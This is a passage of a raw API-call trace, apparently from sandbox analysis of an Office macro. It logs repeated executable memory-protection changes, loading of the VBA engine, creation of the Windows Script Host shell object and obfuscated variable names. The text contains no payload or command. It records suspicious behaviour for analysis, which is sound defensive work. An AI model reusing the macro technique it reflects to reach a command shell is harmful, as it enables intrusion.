lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0109.720] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.721] GetCurrentProcess () returned 0xffffffff [0109.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0109.721] GetCurrentProcess () returned 0xffffffff [0109.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0109.721] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.721] GetCurrentProcess () returned 0xffffffff [0109.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0109.721] GetCurrentProcess () returned 0xffffffff [0109.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0109.722] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.723] GetCurrentProcess () returned 0xffffffff [0109.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0109.723] GetCurrentProcess () returned 0xffffffff [0109.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0109.723] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.723] GetCurrentProcess () returned 0xffffffff [0109.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0109.723] GetCurrentProcess () returned 0xffffffff [0109.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0109.723] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.724] GetCurrentProcess () returned 0xffffffff [0109.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0109.724] GetCurrentProcess () returned 0xffffffff [0109.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0109.724] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.724] GetCurrentProcess () returned 0xffffffff [0109.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0109.724] GetCurrentProcess () returned 0xffffffff [0109.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0109.724] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.725] GetCurrentProcess () returned 0xffffffff [0109.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0109.725] GetCurrentProcess () returned 0xffffffff [0109.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0109.725] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.726] GetCurrentProcess () returned 0xffffffff [0109.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0109.726] GetCurrentProcess () returned 0xffffffff [0109.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0109.726] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.726] GetCurrentProcess () returned 0xffffffff [0109.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0109.726] GetCurrentProcess () returned 0xffffffff [0109.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0109.727] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.727] GetCurrentProcess () returned 0xffffffff [0109.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0109.727] GetCurrentProcess () returned 0xffffffff [0109.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0109.727] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.728] GetCurrentProcess () returned 0xffffffff [0109.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0109.728] GetCurrentProcess () returned 0xffffffff [0109.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0109.728] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.728] GetCurrentProcess () returned 0xffffffff [0109.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0109.729] GetCurrentProcess () returned 0xffffffff [0109.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0109.729] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.729] GetCurrentProcess () returned 0xffffffff [0109.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0109.729] GetCurrentProcess () returned 0xffffffff [0109.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0109.729] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.730] GetCurrentProcess () returned 0xffffffff [0109.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0109.730] GetCurrentProcess () returned 0xffffffff [0109.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0109.730] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.731] GetCurrentProcess () returned 0xffffffff [0109.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0109.731] GetCurrentProcess () returned 0xffffffff [0109.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0109.731] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.731] GetCurrentProcess () returned 0xffffffff [0109.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0109.731] GetCurrentProcess () returned 0xffffffff [0109.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0109.731] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.732] GetCurrentProcess () returned 0xffffffff [0109.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0109.732] GetCurrentProcess () returned 0xffffffff [0109.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0109.732] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.733] GetCurrentProcess () returned 0xffffffff [0109.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0109.733] GetCurrentProcess () returned 0xffffffff [0109.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0109.733] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.733] GetCurrentProcess () returned 0xffffffff [0109.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0109.733] GetCurrentProcess () returned 0xffffffff [0109.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0109.734] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0109.734] GetCurrentProcess () returned 0xffffffff [0109.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0109.734] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.734] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0109.734] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0109.735] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.735] GetProcAddress (hModule=0x69130000, lpProcName=0x272) returned 0x6932533a [0109.737] GetAsyncKeyState (vKey=3) returned 0 [0109.737] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.737] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.737] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.737] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0109.737] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0109.737] CreateBindCtx (in: reserved=0x0, ppbc=0x1977f8 | out: ppbc=0x1977f8*=0xc9f6468) returned 0x0 [0109.738] MkParseDisplayName (in: pbc=0xc9f6468, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x1977fc, ppmk=0x197800 | out: pchEaten=0x1977fc, ppmk=0x197800*=0xc9f6c28) returned 0x0 [0110.777] IUnknown:Release (This=0xc9f6468) returned 0x0 [0110.777] BindMoniker (in: pmk=0xc9f6c28, grfOpt=0x0, iidResult=0x69348088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1977f4 | out: ppvResult=0x1977f4*=0x8cec3f4) returned 0x0 [0111.432] IUnknown:Release (This=0xc9f6c28) returned 0x0 [0111.432] GetAsyncKeyState (vKey=3) returned 0 [0111.435] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197b9c | out: ppsaOut=0x197b9c) returned 0x0 [0111.435] SafeArrayAllocData (psa=0xb3bc5c8) returned 0x0 [0111.444] SafeArrayDestroyData (psa=0xb3bc5c8) returned 0x0 [0111.444] SafeArrayDestroyDescriptor (psa=0xb3bc5c8) returned 0x0 [0111.449] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.449] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0111.449] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0111.450] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.450] GetProcAddress (hModule=0x743d0000, lpProcName="SetTimer") returned 0x743eee50 [0111.450] SetTimer (hWnd=0x0, nIDEvent=0x1188e020, uElapse=0x1, lpTimerFunc=0x1188e020) returned 0x7f71 [0111.450] GetLastError () returned 0x0 [0111.450] CRetailMalloc_Alloc () returned 0xca3d6a8 [0111.451] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.451] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.451] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96", cchCount2=-1) returned 1 [0111.451] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96", cchCount2=-1) returned 1 [0111.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432fa6, cbMultiByte=13, lpWideCharStr=0x1976c4, cchWideChar=14 | out: lpWideCharStr="———––——————–") returned 13 [0111.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0072, cbMultiByte=13, lpWideCharStr=0x197724, cchWideChar=14 | out: lpWideCharStr="———––——————–") returned 13 [0111.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0072, cbMultiByte=13, lpWideCharStr=0x197724, cchWideChar=14 | out: lpWideCharStr="———––——————–") returned 13 [0111.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0072, cbMultiByte=13, lpWideCharStr=0x197724, cchWideChar=14 | out: lpWideCharStr="———––——————–") returned 13 [0111.453] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96", cchCount2=-1) returned 1 [0111.453] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x97\x96\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96", cchCount2=-1) returned 1 [0111.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0072, cbMultiByte=13, lpWideCharStr=0x197724, cchWideChar=14 | out: lpWideCharStr="———––——————–") returned 13 [0111.453] CRetailMalloc_Alloc () returned 0xc6fc218 [0111.453] _mbscpy_s (in: _Dst=0xc6fc218, _DstSizeInBytes=0xd, _Src=0x112b0072 | out: _Dst=0xc6fc218) returned 0x0 [0111.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0d32, cbMultiByte=20, lpWideCharStr=0x197734, cchWideChar=21 | out: lpWideCharStr="_B_var_———––——————–") returned 20 [0111.454] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0xd, _Src=0x112b0072 | out: _Dst=0x19779c) returned 0x0 [0111.454] CRetailMalloc_Free () returned 0x1 [0111.454] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0111.454] memcpy (in: _Dst=0xcb6518c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0111.454] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.454] memcpy (in: _Dst=0xcb65290, _Src=0x1978c4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0111.454] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.454] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11430922, cbMultiByte=9, lpWideCharStr=0x1976c4, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0111.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d0922, cbMultiByte=9, lpWideCharStr=0x197724, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0111.455] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.455] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0111.455] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0111.455] memcpy (in: _Dst=0xca3d710, _Src=0x197944, _Size=0x18 | out: _Dst=0xca3d710) returned 0xca3d710 [0111.455] CRetailMalloc_Realloc () returned 0xca3d6a8 [0111.455] CRetailMalloc_Free () returned 0x1 [0111.455] GetCurrentProcess () returned 0xffffffff [0111.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0111.455] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0111.458] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0111.459] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0111.459] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0111.460] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0111.461] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0111.461] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0111.462] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0111.462] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0111.463] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0111.464] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0111.464] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.465] GetCurrentProcess () returned 0xffffffff [0111.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0111.465] GetCurrentProcess () returned 0xffffffff [0111.465] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0111.465] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0111.466] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0111.467] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.467] GetCurrentProcess () returned 0xffffffff [0111.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0111.467] GetCurrentProcess () returned 0xffffffff [0111.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0111.467] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0111.468] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0111.468] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0111.469] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0111.469] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0111.470] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0111.470] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, 